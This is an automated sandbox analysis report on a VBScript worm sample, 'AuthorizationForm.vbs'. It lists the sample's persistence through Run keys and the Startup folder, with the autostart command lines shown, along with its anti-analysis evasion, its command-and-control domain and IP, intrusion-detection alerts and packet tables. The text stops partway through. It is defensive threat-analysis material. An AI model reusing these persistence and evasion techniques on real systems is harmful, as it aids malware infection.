ID: 42946 Sample Name: AuthorizationForm.vbs Cookbook: default.jbs Time: 20:25:46 Date: 17/01/2018 Version: 20.0.0 Table of Contents
Table of Contents 2 Analysis Report 4 Overview 4 General Information 4 Detection 4 Confidence 4 Classification 5 Analysis Advice 5 Signature Overview 6 AV Detection: 6 Networking: 6 Boot Survival: 6 Stealing of Sensitive Information: 6 Persistence and Installation Behavior: 6 Spreading: 6 System Summary: 6 HIPS / PFW / Operating System Protection Evasion: 7 Anti Debugging: 7 Malware Analysis System Evasion: 7 Hooking and other Techniques for Hiding and Protection: 7 Lowering of HIPS / PFW / Operating System Security Settings: 7 Language, Device and Operating System Detection: 7 Behavior Graph 7 Simulations 8 Behavior and APIs 8 Antivirus Detection 8 Initial Sample 8 Dropped Files 8 Domains 9 Yara Overview 9 Initial Sample 9 PCAP (Network Traffic) 9 Dropped Files 9 Memory Dumps 9 Unpacked PEs 9 Joe Sandbox View / Context 9 IPs 9 Domains 9 ASN 9 Dropped Files 9 Screenshot 9 Startup 10 Created / dropped Files 10 Contacted Domains/Contacted IPs 12 Contacted Domains 12 Contacted IPs 12 Static File Info 12 General 12 File Icon 13 Network Behavior 13 Snort IDS Alerts 13 Network Port Distribution 13 TCP Packets 14
Copyright Joe Security LLC 2018 Page 2 of 30 UDP Packets 15 DNS Queries 16 DNS Answers 16 HTTP Request Dependency Graph 16 HTTP Packets 16 Code Manipulations 19 Statistics 19 Behavior 19 System Behavior 20 Analysis Process: wscript.exe PID: 3100 Parent PID: 2852 20 General 20 File Activities 20 File Created 20 File Deleted 21 File Written 25 Registry Activities 26 Analysis Process: explorer.exe PID: 3188 Parent PID: 2812 27 General 27 File Activities 27 File Created 27 Analysis Process: explorer.exe PID: 3200 Parent PID: 2812 27 General 27 File Activities 27 File Created 27 Analysis Process: explorer.exe PID: 3224 Parent PID: 548 28 General 28 File Activities 28 Registry Activities 28 Analysis Process: explorer.exe PID: 3236 Parent PID: 2812 28 General 28 File Activities 28 File Created 28 Analysis Process: explorer.exe PID: 3300 Parent PID: 548 29 General 29 File Activities 29 Analysis Process: explorer.exe PID: 3344 Parent PID: 548 29 General 29 Registry Activities 29 Analysis Process: wscript.exe PID: 3472 Parent PID: 3344 29 General 29 File Activities 30 Disassembly 30 Code Analysis 30
Copyright Joe Security LLC 2018 Page 3 of 30 Analysis Report
Overview
General Information
Joe Sandbox Version: 20.0.0 Analysis ID: 42946 Start time: 20:25:46 Joe Sandbox Product: CloudBasic Start date: 17.01.2018 Overall analysis duration: 0h 10m 49s Hypervisor based Inspection enabled: false Report type: light Sample file name: AuthorizationForm.vbs Cookbook file name: default.jbs Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1) Number of analysed new started processes analysed: 16 Number of new started drivers analysed: 0 Number of existing processes analysed: 0 Number of existing drivers analysed: 0 Number of injected processes analysed: 0 Technologies HCA enabled EGA enabled HDC enabled Detection: MAL Classification: mal84.evad.spyw.troj.winVBS@9/6@1/1 HCA Information: Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0 EGA Information: Failed HDC Information: Failed Cookbook Comments: Found application associated with file extension: .vbs Warnings: Show All Exclude process from analysis (whitelisted): WmiApSrv.exe, dllhost.exe Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtEnumerateKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.
Detection
Strategy Score Range Reporting Detection
Threshold 84 0 - 100 Report FP / FN
Confidence
Copyright Joe Security LLC 2018 Page 4 of 30 Strategy Score Range Further Analysis Required? Confidence
Threshold 5 0 - 5 false
Classification
Ransomware
Miner Spreading
mmaallliiiccciiioouusss
malicious
Evader Phishing
sssuusssppiiiccciiioouusss
suspicious
cccllleeaann
clean
Exploiter Banker
Spyware Trojan / Bot
Adware
Analysis Advice
Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior
Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Copyright Joe Security LLC 2018 Page 5 of 30 Signature Overview
• AV Detection • Networking • Boot Survival • Stealing of Sensitive Information • Persistence and Installation Behavior • Spreading • System Summary • HIPS / PFW / Operating System Protection Evasion • Anti Debugging • Malware Analysis System Evasion • Hooking and other Techniques for Hiding and Protection • Lowering of HIPS / PFW / Operating System Security Settings • Language, Device and Operating System Detection
Click to jump to signature section
AV Detection:
Antivirus detection for submitted file
Networking:
Downloads files
Performs DNS lookups
Posts data to webserver
Urls found in memory or binary data
Detected TCP or UDP traffic on non-standard ports
Uses known network protocols on non-standard ports
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Boot Survival:
Creates an autostart registry key
Creates a start menu entry (Start Menu\Programs\Startup)
Stores files to the Windows start menu directory
Drops VBS files to the startup folder
Stealing of Sensitive Information:
Searches for user specific document files
Uploads sensitive system information to the internet (privacy leak)
Persistence and Installation Behavior:
Windows Shell Script Host drops VBS files
Spreading:
Enumerates the file system
System Summary:
Uses Rich Edit Controls
Found graphical window changes (likely an installer)
Binary contains paths to debug symbols
Copyright Joe Security LLC 2018 Page 6 of 30 Classification label
Creates files inside the user directory
Creates temporary files
Executes visual basic scripts
Launches a second explorer.exe instance
Queries process information (via WMI, Win32_Process)
Reads ini files
Reads software policies
Sample is known by Antivirus (Virustotal or Metascan)
Spawns processes
Uses an in-process (OLE) Automation server
Deletes Windows files
Java / VBScript file with very long strings (likely obfuscated code)
Reads the hosts file
Suspicious javascript / visual basic script found (invalid extension)
HIPS / PFW / Operating System Protection Evasion:
May try to detect the Windows Explorer process (often used for injection)
Anti Debugging:
Checks for debuggers (devices)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Malware Analysis System Evasion:
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Enumerates the file system
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Hooking and other Techniques for Hiding and Protection:
Disables application error messsages (SetErrorMode)
System process connects to network (likely due to code injection or exploit)
Uses known network protocols on non-standard ports
Lowering of HIPS / PFW / Operating System Security Settings:
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Language, Device and Operating System Detection:
Queries the cryptographic machine GUID
Behavior Graph
Copyright Joe Security LLC 2018 Page 7 of 30 Hide Legend Legend: Process Signature Created File DNS/IP Info Is Dropped Behavior Graph
ID: 42946 Is Windows Process
Sample: AuthorizationForm.vbs Number of created Registry Values Startdate: 17/01/2018
Architecture: WINDOWS Score: 84 Number of created Files
Visual Basic Snort IDS alert for Detected TCP or UDP network traffic (e.g. Antivirus detection traffic on non-standard 3 other signatures started started started based on Emerging Threat for submitted file ports rules) Delphi
Java wscript.exe explorer.exe explorer.exe .Net C# or VB.NET 4 other processes 2 16 2 4 C, C++ or other language
shkis.publicvm.com
141.255.146.245, 49164, 49165, 49166 dropped dropped dropped dropped Is malicious dropped IELOIELOMainNetworkFR Netherlands
C:\...\AuthorizationForm.vbs:Zone.Identifier, ASCII C:\Users\user\...\AuthorizationForm.vbs, ASCII C:\...\AuthorizationForm.vbs:Zone.Identifier, ASCII C:\Users\user\...\AuthorizationForm.vbs, ASCII started unknown, Hitachi
System process connects Detected TCP or UDP Suspicious javascript Windows Shell Script Drops VBS files to the to network (likely due traffic on non-standard / visual basic script Host drops VBS files startup folder to code injection or ports found (invalid extension) exploit)
wscript.exe
1
Simulations
Behavior and APIs
Time Type Description 20:26:16 API Interceptor 4062x Sleep call for process: wscript.exe modified from: 60000ms to: 100ms 20:26:18 API Interceptor 43x Sleep call for process: explorer.exe modified from: 60000ms to: 100ms 20:26:18 Autostart Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run AuthorizationForm wscript.exe //B "C:\Users\user\AppData\Roaming\AuthorizationForm.vbs" 20:26:18 Autostart Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run AuthorizationForm wscript.exe //B "C:\Users\user\AppData\Roaming\AuthorizationForm.vbs" 20:26:19 Autostart Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AuthorizationForm.vbs
Antivirus Detection
Initial Sample
Source Detection Cloud Link AuthorizationForm.vbs 16% virustotal Browse AuthorizationForm.vbs 8% metadefender Browse
Dropped Files
Copyright Joe Security LLC 2018 Page 8 of 30 No Antivirus matches
Domains
Source Detection Cloud Link shkis.publicvm.com 3% virustotal Browse
Yara Overview
Initial Sample
No yara matches
PCAP (Network Traffic)
No yara matches
Dropped Files
No yara matches
Memory Dumps
No yara matches
Unpacked PEs
No yara matches
Joe Sandbox View / Context
IPs
No context
Domains
No context
ASN
Associated Sample Match Name / URL SHA 256 Detection Link Context IELOIELOMainNetworkFR Invoice.rtf 110695ae3af358132ab7fe6081e1 malicious Browse 141.255.144.211 f559e162bb76eef9837b9f3f41615 56ae7d5
Dropped Files
No context
Screenshot
Copyright Joe Security LLC 2018 Page 9 of 30 Startup
System is w7 wscript.exe (PID: 3100 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\Desktop\AuthorizationForm.vbs' MD5: 979D74799EA6C8B8167869A68DF5204A) explorer.exe (PID: 3188 cmdline: explorer.exe wscript.exe //B 'C:\Users\user\AppData\Roaming\AuthorizationForm.vbs' MD5: 6DDCA324434FFA506CF7DC4E51DB7935) explorer.exe (PID: 3200 cmdline: explorer.exe wscript.exe //B 'C:\Users\user\AppData\Roaming\AuthorizationForm.vbs' MD5: 6DDCA324434FFA506CF7DC4E51DB7935) explorer.exe (PID: 3224 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 6DDCA324434FFA506CF7DC4E51DB7935) explorer.exe (PID: 3236 cmdline: explorer.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AuthorizationForm.vbs MD5: 6DDCA324434FFA506CF7DC4E51DB7935) explorer.exe (PID: 3300 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 6DDCA324434FFA506CF7DC4E51DB7935) explorer.exe (PID: 3344 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 6DDCA324434FFA506CF7DC4E51DB7935) wscript.exe (PID: 3472 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AuthorizationForm.vbs' MD5: 979D74799EA6C8B8167869A68DF5204A) cleanup
Created / dropped Files
C:\Users\user\AppData\Roaming\AuthorizationForm.vbs
File Type: ASCII text, with very long lines, with CRLF line terminators Size (bytes): 296792 Entropy (8bit): 5.396667537631847 Encrypted: false MD5: 5AFD6DB7F26AEF5CD3FDE76E3D7F5934 SHA1: FF5701FE33BDABE31D9987AA78C69235D77561C9 SHA-256: 8CFC6F69B81E46A4FD337BB75DABD46DCC4861FD9557A858DDC234E9FF2A3BE9
Copyright Joe Security LLC 2018 Page 10 of 30 C:\Users\user\AppData\Roaming\AuthorizationForm.vbs
SHA-512: 9B16BF8E16BE62C3A9E3FDA6C2A8FC2DA096F9EB25E3244A5BA573D23E2DC08D7F6F98CF57CD3A957DC0A9E6 9018386F94C8AF819C9F512C4B91D82D50F9C016 Malicious: true Reputation: low
C:\Users\user\AppData\Roaming\AuthorizationForm.vbs:Zone.Identifier
File Type: ASCII text, with CRLF line terminators Size (bytes): 26 Entropy (8bit): 3.9500637564362093 Encrypted: false MD5: 187F488E27DB4AF347237FE461A079AD SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64 SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309 SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53B C731530C92F7327BB7DC9CDE1B60FB21CD64E Malicious: true Reputation: high, very likely benign file
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AuthorizationForm.vbs
File Type: ASCII text, with very long lines, with CRLF line terminators Size (bytes): 296792 Entropy (8bit): 5.396667537631847 Encrypted: false MD5: 5AFD6DB7F26AEF5CD3FDE76E3D7F5934 SHA1: FF5701FE33BDABE31D9987AA78C69235D77561C9 SHA-256: 8CFC6F69B81E46A4FD337BB75DABD46DCC4861FD9557A858DDC234E9FF2A3BE9 SHA-512: 9B16BF8E16BE62C3A9E3FDA6C2A8FC2DA096F9EB25E3244A5BA573D23E2DC08D7F6F98CF57CD3A957DC0A9E6 9018386F94C8AF819C9F512C4B91D82D50F9C016 Malicious: true Reputation: low
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AuthorizationForm.vbs:Zone.Identifier
File Type: ASCII text, with CRLF line terminators Size (bytes): 26 Entropy (8bit): 3.9500637564362093 Encrypted: false MD5: 187F488E27DB4AF347237FE461A079AD SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64 SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309 SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53B C731530C92F7327BB7DC9CDE1B60FB21CD64E Malicious: true Reputation: high, very likely benign file
\samr File Type: Hitachi SH big-endian COFF object, not stripped Size (bytes): 116 Entropy (8bit): 4.053374040827533 Encrypted: false MD5: 080E701E8B8E2E9C68203C150AC7C6B7 SHA1: 4EF041621388B805758AE1D3B122F9D364705223 SHA-256: FE129AE2A7C96708754F6F51091E6E512C9FEACA1042A1E9DB914C651FEB344D SHA-512: C11D88B8E355B7B922B985802464B693F75BA4C2A62F9137A15842CA82F9B6B3ED13059EDC0DF1C04E7DE43719 D892B4C0D22BB67BE0D57EAB368BA1BC057E79 Malicious: false Reputation: high, very likely benign file
unknown
File Type: Hitachi SH big-endian COFF object, not stripped Size (bytes): 116 Entropy (8bit): 4.053374040827533 Encrypted: false MD5: 080E701E8B8E2E9C68203C150AC7C6B7 SHA1: 4EF041621388B805758AE1D3B122F9D364705223 SHA-256: FE129AE2A7C96708754F6F51091E6E512C9FEACA1042A1E9DB914C651FEB344D
Copyright Joe Security LLC 2018 Page 11 of 30 unknown
SHA-512: C11D88B8E355B7B922B985802464B693F75BA4C2A62F9137A15842CA82F9B6B3ED13059EDC0DF1C04E7DE43719 D892B4C0D22BB67BE0D57EAB368BA1BC057E79 Malicious: true Reputation: high, very likely benign file
Contacted Domains/Contacted IPs
Contacted Domains
Name IP Active Malicious Antivirus Detection shkis.publicvm.com 141.255.146.245 true true 3%, virustotal, Browse
Contacted IPs
No. of IPs < 25%
25% < No. of IPs < 50% 50% < No. of IPs < 75%
75% < No. of IPs
IP Country Flag ASN ASN Name Malicious 141.255.146.245 Netherlands 29075 IELOIELOMainNetworkFR true
Static File Info
General
File type: ASCII text, with very long lines, with CRLF line t erminators Entropy (8bit): 5.396667537631847 TrID: File name: AuthorizationForm.vbs File size: 296792 MD5: 5afd6db7f26aef5cd3fde76e3d7f5934 SHA1: ff5701fe33bdabe31d9987aa78c69235d77561c9 SHA256: 8cfc6f69b81e46a4fd337bb75dabd46dcc4861fd9557a85 8ddc234e9ff2a3be9 SHA512: 9b16bf8e16be62c3a9e3fda6c2a8fc2da096f9eb25e3244 a5ba573d23e2dc08d7f6f98cf57cd3a957dc0a9e6901838 6f94c8af819c9f512c4b91d82d50f9c016
Copyright Joe Security LLC 2018 Page 12 of 30 General
File Content Preview: ''mRzjMuvQIYGIUzwZilEDgejfTvADzvMmxjOkwmKGDx vlRhTQhliSTugyfSTFuUeyUvvSGgHHQxMTTKIQGTyjh xIEEwvOORQOSKTLIgHZFQAEvxKhUhLGuGluSR..'m RzjMuvQIYGIUzwZilEDgejfTvADzvMmxjOkwmKGDxvl RhTQhliSTugyfSTFuUeyUvvSGgHHQxMTTKIQGTyjhxI EEwvOORQOSKTLIgHZFQAEvxKhUhLGuGluSR..'mR z
File Icon
Network Behavior
Snort IDS Alerts
Source Dest Timestamp Protocol SID Message Port Port Source IP Dest IP 01/17/18- TCP 2017516 ET TROJAN Worm.VBS.Dunihi Checkin 1 49164 83 192.168.2.2 141.255.146.245 20:26:32.173908 01/17/18- TCP 2017516 ET TROJAN Worm.VBS.Dunihi Checkin 1 49165 83 192.168.2.2 141.255.146.245 20:28:49.204527 01/17/18- TCP 2017516 ET TROJAN Worm.VBS.Dunihi Checkin 1 49166 83 192.168.2.2 141.255.146.245 20:31:04.239506 01/17/18- TCP 2017516 ET TROJAN Worm.VBS.Dunihi Checkin 1 49167 83 192.168.2.2 141.255.146.245 20:32:40.879216 01/17/18- TCP 2017516 ET TROJAN Worm.VBS.Dunihi Checkin 1 49168 83 192.168.2.2 141.255.146.245 20:32:54.107383 01/17/18- TCP 2017516 ET TROJAN Worm.VBS.Dunihi Checkin 1 49169 83 192.168.2.2 141.255.146.245 20:33:07.531547 01/17/18- TCP 2017516 ET TROJAN Worm.VBS.Dunihi Checkin 1 49170 83 192.168.2.2 141.255.146.245 20:33:21.001355 01/17/18- TCP 2017516 ET TROJAN Worm.VBS.Dunihi Checkin 1 49171 83 192.168.2.2 141.255.146.245 20:33:34.377418 01/17/18- TCP 2017516 ET TROJAN Worm.VBS.Dunihi Checkin 1 49172 83 192.168.2.2 141.255.146.245 20:33:47.679172 01/17/18- TCP 2017516 ET TROJAN Worm.VBS.Dunihi Checkin 1 49173 83 192.168.2.2 141.255.146.245 20:34:01.086682 01/17/18- TCP 2017516 ET TROJAN Worm.VBS.Dunihi Checkin 1 49174 83 192.168.2.2 141.255.146.245 20:34:14.583150 01/17/18- TCP 2017516 ET TROJAN Worm.VBS.Dunihi Checkin 1 49175 83 192.168.2.2 141.255.146.245 20:34:27.979750 01/17/18- TCP 2017516 ET TROJAN Worm.VBS.Dunihi Checkin 1 49176 83 192.168.2.2 141.255.146.245 20:34:41.336472 01/17/18- TCP 2017516 ET TROJAN Worm.VBS.Dunihi Checkin 1 49177 83 192.168.2.2 141.255.146.245 20:34:54.392509
Network Port Distribution
Total Packets: 70 • 83 undefined • 53 (DNS)
Copyright Joe Security LLC 2018 Page 13 of 30 TCP Packets
Timestamp Source Port Dest Port Source IP Dest IP Jan 17, 2018 20:26:31.234621048 CET 63266 53 192.168.2.2 8.8.8.8 Jan 17, 2018 20:26:31.572985888 CET 53 63266 8.8.8.8 192.168.2.2 Jan 17, 2018 20:26:32.173317909 CET 49164 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:26:32.173360109 CET 83 49164 141.255.146.245 192.168.2.2 Jan 17, 2018 20:26:32.173437119 CET 49164 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:26:32.173907995 CET 49164 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:26:32.173918962 CET 83 49164 141.255.146.245 192.168.2.2 Jan 17, 2018 20:28:43.062742949 CET 83 49164 141.255.146.245 192.168.2.2 Jan 17, 2018 20:28:43.062912941 CET 49164 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:28:43.063297987 CET 49164 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:28:43.063327074 CET 83 49164 141.255.146.245 192.168.2.2 Jan 17, 2018 20:28:49.204102993 CET 49165 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:28:49.204127073 CET 83 49165 141.255.146.245 192.168.2.2 Jan 17, 2018 20:28:49.204211950 CET 49165 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:28:49.204526901 CET 49165 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:28:49.204536915 CET 83 49165 141.255.146.245 192.168.2.2 Jan 17, 2018 20:30:58.059910059 CET 83 49165 141.255.146.245 192.168.2.2 Jan 17, 2018 20:30:58.060008049 CET 49165 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:30:58.073566914 CET 49165 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:30:58.073584080 CET 83 49165 141.255.146.245 192.168.2.2 Jan 17, 2018 20:31:04.239099979 CET 49166 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:31:04.239125967 CET 83 49166 141.255.146.245 192.168.2.2 Jan 17, 2018 20:31:04.239173889 CET 49166 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:31:04.239506006 CET 49166 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:31:04.239516973 CET 83 49166 141.255.146.245 192.168.2.2 Jan 17, 2018 20:32:34.757282972 CET 83 49166 141.255.146.245 192.168.2.2 Jan 17, 2018 20:32:34.757496119 CET 49166 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:32:34.757675886 CET 49166 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:32:34.757700920 CET 83 49166 141.255.146.245 192.168.2.2 Jan 17, 2018 20:32:40.878797054 CET 49167 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:32:40.878822088 CET 83 49167 141.255.146.245 192.168.2.2 Jan 17, 2018 20:32:40.878911972 CET 49167 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:32:40.879215956 CET 49167 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:32:40.879225016 CET 83 49167 141.255.146.245 192.168.2.2 Jan 17, 2018 20:32:48.039513111 CET 83 49167 141.255.146.245 192.168.2.2 Jan 17, 2018 20:32:48.039767981 CET 49167 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:32:48.043046951 CET 49167 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:32:48.043066978 CET 83 49167 141.255.146.245 192.168.2.2 Jan 17, 2018 20:32:54.106647015 CET 49168 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:32:54.106672049 CET 83 49168 141.255.146.245 192.168.2.2 Jan 17, 2018 20:32:54.107011080 CET 49168 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:32:54.107383013 CET 49168 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:32:54.107393026 CET 83 49168 141.255.146.245 192.168.2.2 Jan 17, 2018 20:33:01.417999029 CET 83 49168 141.255.146.245 192.168.2.2 Jan 17, 2018 20:33:01.418139935 CET 49168 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:33:01.449815035 CET 49168 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:33:01.449830055 CET 83 49168 141.255.146.245 192.168.2.2 Jan 17, 2018 20:33:07.530610085 CET 49169 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:33:07.530635118 CET 83 49169 141.255.146.245 192.168.2.2 Jan 17, 2018 20:33:07.530798912 CET 49169 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:33:07.531547070 CET 49169 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:33:07.531558990 CET 83 49169 141.255.146.245 192.168.2.2 Jan 17, 2018 20:33:14.817270041 CET 83 49169 141.255.146.245 192.168.2.2 Jan 17, 2018 20:33:14.817533016 CET 49169 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:33:14.824584961 CET 49169 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:33:14.824606895 CET 83 49169 141.255.146.245 192.168.2.2 Jan 17, 2018 20:33:21.000951052 CET 49170 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:33:21.000981092 CET 83 49170 141.255.146.245 192.168.2.2 Jan 17, 2018 20:33:21.001034021 CET 49170 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:33:21.001354933 CET 49170 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:33:21.001365900 CET 83 49170 141.255.146.245 192.168.2.2 Jan 17, 2018 20:33:28.218935013 CET 83 49170 141.255.146.245 192.168.2.2 Copyright Joe Security LLC 2018 Page 14 of 30 Timestamp Source Port Dest Port Source IP Dest IP Jan 17, 2018 20:33:28.219080925 CET 49170 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:33:28.219276905 CET 49170 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:33:28.219301939 CET 83 49170 141.255.146.245 192.168.2.2 Jan 17, 2018 20:33:34.376969099 CET 49171 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:33:34.377006054 CET 83 49171 141.255.146.245 192.168.2.2 Jan 17, 2018 20:33:34.377114058 CET 49171 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:33:34.377418041 CET 49171 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:33:34.377429008 CET 83 49171 141.255.146.245 192.168.2.2 Jan 17, 2018 20:33:41.616516113 CET 83 49171 141.255.146.245 192.168.2.2 Jan 17, 2018 20:33:41.616728067 CET 49171 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:33:41.616965055 CET 49171 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:33:41.616992950 CET 83 49171 141.255.146.245 192.168.2.2 Jan 17, 2018 20:33:47.678314924 CET 49172 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:33:47.678350925 CET 83 49172 141.255.146.245 192.168.2.2 Jan 17, 2018 20:33:47.678535938 CET 49172 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:33:47.679172039 CET 49172 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:33:47.679186106 CET 83 49172 141.255.146.245 192.168.2.2 Jan 17, 2018 20:33:55.013446093 CET 83 49172 141.255.146.245 192.168.2.2 Jan 17, 2018 20:33:55.013612032 CET 49172 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:33:55.013880968 CET 49172 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:33:55.013911009 CET 83 49172 141.255.146.245 192.168.2.2 Jan 17, 2018 20:34:01.086283922 CET 49173 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:34:01.086308956 CET 83 49173 141.255.146.245 192.168.2.2 Jan 17, 2018 20:34:01.086354017 CET 49173 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:34:01.086682081 CET 49173 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:34:01.086690903 CET 83 49173 141.255.146.245 192.168.2.2 Jan 17, 2018 20:34:08.416915894 CET 83 49173 141.255.146.245 192.168.2.2 Jan 17, 2018 20:34:08.417181969 CET 49173 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:34:08.463993073 CET 49173 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:34:08.464029074 CET 83 49173 141.255.146.245 192.168.2.2 Jan 17, 2018 20:34:14.582721949 CET 49174 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:34:14.582745075 CET 83 49174 141.255.146.245 192.168.2.2 Jan 17, 2018 20:34:14.582813978 CET 49174 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:34:14.583149910 CET 49174 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:34:14.583158970 CET 83 49174 141.255.146.245 192.168.2.2 Jan 17, 2018 20:34:21.828094959 CET 83 49174 141.255.146.245 192.168.2.2 Jan 17, 2018 20:34:21.828280926 CET 49174 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:34:21.828501940 CET 49174 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:34:21.828526974 CET 83 49174 141.255.146.245 192.168.2.2 Jan 17, 2018 20:34:27.979310036 CET 49175 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:34:27.979337931 CET 83 49175 141.255.146.245 192.168.2.2 Jan 17, 2018 20:34:27.979404926 CET 49175 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:34:27.979749918 CET 49175 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:34:27.979760885 CET 83 49175 141.255.146.245 192.168.2.2 Jan 17, 2018 20:34:35.216550112 CET 83 49175 141.255.146.245 192.168.2.2 Jan 17, 2018 20:34:35.216766119 CET 49175 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:34:35.217005968 CET 49175 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:34:35.217034101 CET 83 49175 141.255.146.245 192.168.2.2 Jan 17, 2018 20:34:41.336033106 CET 49176 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:34:41.336055040 CET 83 49176 141.255.146.245 192.168.2.2 Jan 17, 2018 20:34:41.336129904 CET 49176 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:34:41.336472034 CET 49176 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:34:41.336481094 CET 83 49176 141.255.146.245 192.168.2.2 Jan 17, 2018 20:34:48.541244030 CET 83 49176 141.255.146.245 192.168.2.2 Jan 17, 2018 20:34:48.541498899 CET 49176 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:34:48.541673899 CET 49176 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:34:48.541697979 CET 83 49176 141.255.146.245 192.168.2.2 Jan 17, 2018 20:34:54.392252922 CET 49177 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:34:54.392281055 CET 83 49177 141.255.146.245 192.168.2.2 Jan 17, 2018 20:34:54.392369986 CET 49177 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:34:54.392508984 CET 49177 83 192.168.2.2 141.255.146.245 Jan 17, 2018 20:34:54.392522097 CET 83 49177 141.255.146.245 192.168.2.2
UDP Packets
Copyright Joe Security LLC 2018 Page 15 of 30 Timestamp Source Port Dest Port Source IP Dest IP Jan 17, 2018 20:26:31.234621048 CET 63266 53 192.168.2.2 8.8.8.8 Jan 17, 2018 20:26:31.572985888 CET 53 63266 8.8.8.8 192.168.2.2
DNS Queries
